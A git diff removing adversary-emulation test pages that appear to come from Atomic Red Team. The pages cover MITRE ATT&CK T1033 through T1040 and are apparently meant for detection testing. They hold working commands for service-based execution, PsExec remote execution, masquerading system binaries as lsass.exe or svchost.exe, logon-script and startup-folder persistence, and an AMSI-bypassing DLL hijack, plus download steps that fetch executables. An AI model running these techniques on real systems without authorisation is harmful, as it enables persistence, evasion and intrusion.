diff --git a/Atomic_Threat_Coverage/Triggers/T1033.md b/Atomic_Threat_Coverage/Triggers/T1033.md
deleted file mode 100644
index 276e9ab..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1033.md
+++ /dev/null
@@ -1,88 +0,0 @@
-# T1033 - System Owner/User Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1033)
-<blockquote>### Windows
-
-Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-### Mac
-
-On Mac, the currently logged in user can be identified with <code>users</code>,<code>w</code>, and <code>who</code>.
-
-### Linux
-
-On Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - System Owner/User Discovery](#atomic-test-1---system-owneruser-discovery)
-
-- [Atomic Test #2 - System Owner/User Discovery](#atomic-test-2---system-owneruser-discovery)
-
-
-<br/>
-
-## Atomic Test #1 - System Owner/User Discovery
-Identify System owner or users on an endpoint.
-
-Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. 
-Additionally, two files will be written to disk - computers.txt and usernames.txt.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| computer_name | Name of remote computer | string | localhost|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-cmd.exe /C whoami
-wmic useraccount get /ALL
-quser /SERVER:"#{computer_name}"
-quser
-qwinsta.exe" /server:#{computer_name}
-qwinsta.exe
-for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
-@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - System Owner/User Discovery
-Identify System owner or users on an endpoint
-
-Upon successful execution, sh will stdout list of usernames.
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-users
-w
-who
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1035.md b/Atomic_Threat_Coverage/Triggers/T1035.md
deleted file mode 100644
index 0d1ec12..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1035.md
+++ /dev/null
@@ -1,93 +0,0 @@
-# T1035 - Service Execution
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1035)
-<blockquote>Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Execute a Command as a Service](#atomic-test-1---execute-a-command-as-a-service)
-
-- [Atomic Test #2 - Use PsExec to execute a command on a remote host](#atomic-test-2---use-psexec-to-execute-a-command-on-a-remote-host)
-
-
-<br/>
-
-## Atomic Test #1 - Execute a Command as a Service
-Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.
-
-Upon successful execution, cmd.exe create a new service using sc.exe create that will start powershell.exe to create a new file `art-marker.txt`
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| service_name | Name of service to create | string | ARTService|
-| executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:&#92;art-marker.txt|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-sc.exe create #{service_name} binPath= #{executable_command}
-sc.exe start #{service_name}
-sc.exe delete #{service_name}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Use PsExec to execute a command on a remote host
-Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments
-Will run a command on a remote host.
-
-Upon successful execution, powershell will download psexec.exe and spawn calc.exe on a remote endpoint (default:localhost).
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| psexec_exe | Path to PsExec | string | C:&#92;PSTools&#92;PsExec.exe|
-| remote_host | Remote hostname or IP address | string | localhost|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-#{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe"
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
-Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
-New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null
-Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1036.md b/Atomic_Threat_Coverage/Triggers/T1036.md
deleted file mode 100644
index 9aed070..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1036.md
+++ /dev/null
@@ -1,310 +0,0 @@
-# T1036 - Masquerading
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1036)
-<blockquote>Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
-
-One variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.
-
-A third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. 
-
-Adversaries may modify a binary's metadata, including such fields as icons, version, name of the product, description, and copyright, to better blend in with the environment and increase chances of deceiving a security analyst or product.(Citation: Threatexpress MetaTwin 2017)
-
-### Windows
-In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
-
-An example of abuse of trusted locations in Windows would be the <code>C:\Windows\System32</code> directory. Examples of trusted binary names that can be given to malicious binares include "explorer.exe" and "svchost.exe".
-
-### Linux
-Another variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)
-
-An example of abuse of trusted locations in Linux  would be the <code>/bin</code> directory. Examples of trusted binary names that can be given to malicious binaries include "rsyncd" and "dbus-inotifier". (Citation: Fysbis Palo Alto Analysis)  (Citation: Fysbis Dr Web Analysis)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Masquerading as Windows LSASS process](#atomic-test-1---masquerading-as-windows-lsass-process)
-
-- [Atomic Test #2 - Masquerading as Linux crond process.](#atomic-test-2---masquerading-as-linux-crond-process)
-
-- [Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe](#atomic-test-3---masquerading---cscriptexe-running-as-notepadexe)
-
-- [Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe](#atomic-test-4---masquerading---wscriptexe-running-as-svchostexe)
-
-- [Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe](#atomic-test-5---masquerading---powershellexe-running-as-taskhostwexe)
-
-- [Atomic Test #6 - Masquerading - non-windows exe running as windows exe](#atomic-test-6---masquerading---non-windows-exe-running-as-windows-exe)
-
-- [Atomic Test #7 - Masquerading - windows exe running as different windows exe](#atomic-test-7---masquerading---windows-exe-running-as-different-windows-exe)
-
-- [Atomic Test #8 - Malicious process Masquerading as LSM.exe](#atomic-test-8---malicious-process-masquerading-as-lsmexe)
-
-
-<br/>
-
-## Atomic Test #1 - Masquerading as Windows LSASS process
-Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
-
-Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
-%SystemRoot%\Temp\lsass.exe /B
-```
-
-#### Cleanup Commands:
-```cmd
-del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Masquerading as Linux crond process.
-Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
-
-Upon successful execution, sh is renamed to `crond` and executed.
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-cp /bin/sh /tmp/crond
-/tmp/crond
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe
-Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe.
-
-Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
-cmd.exe /c %APPDATA%\notepad.exe /B
-```
-
-#### Cleanup Commands:
-```cmd
-del /Q /F %APPDATA%\notepad.exe >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe
-Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.
-
-Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
-cmd.exe /c %APPDATA%\svchost.exe /B
-```
-
-#### Cleanup Commands:
-```cmd
-del /Q /F %APPDATA%\svchost.exe >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe
-Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe.
-
-Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
-cmd.exe /K %APPDATA%\taskhostw.exe
-```
-
-#### Cleanup Commands:
-```cmd
-del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Masquerading - non-windows exe running as windows exe
-Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe
-
-Upon successful execution, powershell will execute T1036.exe as svchost.exe from on a non-standard path.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| inputfile | path of file to copy | path | PathToAtomicsFolder&#92;T1036&#92;bin&#92;t1036.exe|
-| outputfile | path of file to execute | path | ($env:TEMP + "&#92;svchost.exe")|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-copy #{inputfile} #{outputfile}
-$myT1036 = (Start-Process -PassThru -FilePath #{outputfile}).Id
-Stop-Process -ID $myT1036
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item #{outputfile} -Force -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Exe file to copy must exist on disk at specified location (#{inputfile})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{inputfile}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/t1036.exe" -OutFile "#{inputfile}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Masquerading - windows exe running as different windows exe
-Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| inputfile | path of file to copy | path | $env:ComSpec|
-| outputfile | path of file to execute | path | ($env:TEMP + "&#92;svchost.exe")|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-copy #{inputfile} #{outputfile}
-$myT1036 = (Start-Process -PassThru -FilePath #{outputfile}).Id
-Stop-Process -ID $myT1036
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item #{outputfile} -Force -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Malicious process Masquerading as LSM.exe
-Detect LSM running from an incorrect directory and an incorrect service account
-This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder.
-
-Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-copy C:\Windows\System32\cmd.exe C:\lsm.exe
-C:\lsm.exe /c echo T1036 > C:\T1036.txt
-```
-
-#### Cleanup Commands:
-```cmd
-del C:\T1036.txt >nul 2>&1
-del C:\lsm.exe >nul 2>&1
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1037.md b/Atomic_Threat_Coverage/Triggers/T1037.md
deleted file mode 100644
index 50139ce..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1037.md
+++ /dev/null
@@ -1,233 +0,0 @@
-# T1037 - Logon Scripts
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1037)
-<blockquote>### Windows
-
-Windows allows logon scripts to be run whenever a specific user or group of users log into a system. (Citation: TechNet Logon Scripts) The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server.
-
-If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in. This code can allow them to maintain persistence on a single system, if it is a local script, or to move laterally within a network, if the script is stored on a central server and pushed to many systems. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.
-
-### Mac
-
-Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root (Citation: creating login hook). There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Logon Scripts](#atomic-test-1---logon-scripts)
-
-- [Atomic Test #2 - Scheduled Task Startup Script](#atomic-test-2---scheduled-task-startup-script)
-
-- [Atomic Test #3 - Logon Scripts - Mac](#atomic-test-3---logon-scripts---mac)
-
-- [Atomic Test #4 - Supicious vbs file run from startup Folder](#atomic-test-4---supicious-vbs-file-run-from-startup-folder)
-
-- [Atomic Test #5 - Supicious jse file run from startup Folder](#atomic-test-5---supicious-jse-file-run-from-startup-folder)
-
-- [Atomic Test #6 - Supicious bat file run from startup Folder](#atomic-test-6---supicious-bat-file-run-from-startup-folder)
-
-
-<br/>
-
-## Atomic Test #1 - Logon Scripts
-Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
-that can be viewed in the Registry Editor.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| script_path | Path to .bat file | String | %temp%&#92;art.bat|
-| script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%&#92;desktop&#92;T1037-log.txt|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-echo "#{script_command}" > #{script_path}
-REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
-```
-
-#### Cleanup Commands:
-```cmd
-REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1
-del #{script_path} >nul 2>&1
-del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Scheduled Task Startup Script
-Run an exe on user logon or system startup.  Upon execution, success messages will be displayed for the two scheduled tasks. To view
-the tasks, open the Task Scheduler and look in the Active Tasks pane.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-schtasks /create /tn "T1037_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
-schtasks /create /tn "T1037_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
-```
-
-#### Cleanup Commands:
-```cmd
-schtasks /delete /tn "T1037_OnLogon" /f >nul 2>&1
-schtasks /delete /tn "T1037_OnStartup" /f >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Logon Scripts - Mac
-Mac logon script
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Run it with these steps! 
-1. Create the required plist file
-
-    sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist
-
-2. Populate the plist with the location of your shell script
-
-    sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh
-
-3. Create the required plist file in the target user's Preferences directory
-
-	  touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
-
-4. Populate the plist with the location of your shell script
-
-	  defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh
-
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Supicious vbs file run from startup Folder
-vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1137 Hello, World VBS!" will be displayed twice. 
-Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
-folder and will also run when the computer is restarted and the user logs in.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Copy-Item $PathToAtomicsFolder\T1037\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
-Copy-Item $PathToAtomicsFolder\T1037\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
-cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
-cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore
-Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Supicious jse file run from startup Folder
-jse files can be placed in and ran from the startup folder to maintain persistance.
-Upon execution, "T1137 Hello, World JSE!" will be displayed twice. 
-Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
-folder and will also run when the computer is restarted and the user logs in.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Copy-Item $PathToAtomicsFolder\T1037\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
-Copy-Item $PathToAtomicsFolder\T1037\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
-cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
-cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore
-Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Supicious bat file run from startup Folder
-bat files can be placed in and executed from the startup folder to maintain persistance.
-Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
-folder and will also run when the computer is restarted and the user logs in.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Copy-Item $PathToAtomicsFolder\T1037\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
-Copy-Item $PathToAtomicsFolder\T1037\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
-Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
-Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore
-Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1038.md b/Atomic_Threat_Coverage/Triggers/T1038.md
deleted file mode 100644
index 923e61c..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1038.md
+++ /dev/null
@@ -1,51 +0,0 @@
-# T1038 - DLL Search Order Hijacking
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1038)
-<blockquote>Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. 
-
-Adversaries may perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL. 
-
-Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant Search Order)
-
-If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
-
-Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - DLL Search Order Hijacking - amsi.dll](#atomic-test-1---dll-search-order-hijacking---amsidll)
-
-
-<br/>
-
-## Atomic Test #1 - DLL Search Order Hijacking - amsi.dll
-Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface)
-https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
-
-Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
-copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
-%APPDATA%\updater.exe -Command exit
-```
-
-#### Cleanup Commands:
-```cmd
-del %APPDATA%\updater.exe >nul 2>&1
-del %APPDATA%\amsi.dll >nul 2>&1
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1040.md b/Atomic_Threat_Coverage/Triggers/T1040.md
deleted file mode 100644
index f82f36b..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1040.md
+++ /dev/null
@@ -1,149 +0,0 @@
-# T1040 - Network Sniffing
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1040)
-<blockquote>Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-
-Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
-
-Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Packet Capture Linux](#atomic-test-1---packet-capture-linux)
-
-- [Atomic Test #2 - Packet Capture macOS](#atomic-test-2---packet-capture-macos)
-
-- [Atomic Test #3 - Packet Capture Windows Command Prompt](#atomic-test-3---packet-capture-windows-command-prompt)
-
-- [Atomic Test #4 - Packet Capture PowerShell](#atomic-test-4---packet-capture-powershell)
-
-
-<br/>
-
-## Atomic Test #1 - Packet Capture Linux
-Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
-
-Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. 
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| interface | Specify interface to perform PCAP on. | String | ens33|
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-tcpdump -c 5 -nnni #{interface}
-tshark -c 5 -i #{interface}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Packet Capture macOS
-Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
-
-Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A.
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| interface | Specify interface to perform PCAP on. | String | en0A|
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-tcpdump -c 5 -nnni #{interface}
-tshark -c 5 -i #{interface}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Packet Capture Windows Command Prompt
-Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark
-installed, along with WinPCAP. Windump will require the windump executable.
-
-Upon successful execution, tshark will execute and capture 5 packets on interface Ethernet0.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| interface | Specify interface to perform PCAP on. | String | Ethernet0|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
-c:\windump.exe
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Packet Capture PowerShell
-Perform a packet capture using PowerShell with windump or tshark. This will require a host that has Wireshark/Tshark
-installed, along with WinPCAP. Windump will require the windump executable.
-
-Upon successful execution, tshark will spawn from powershell and capture 5 packets on interface Ethernet0.
-
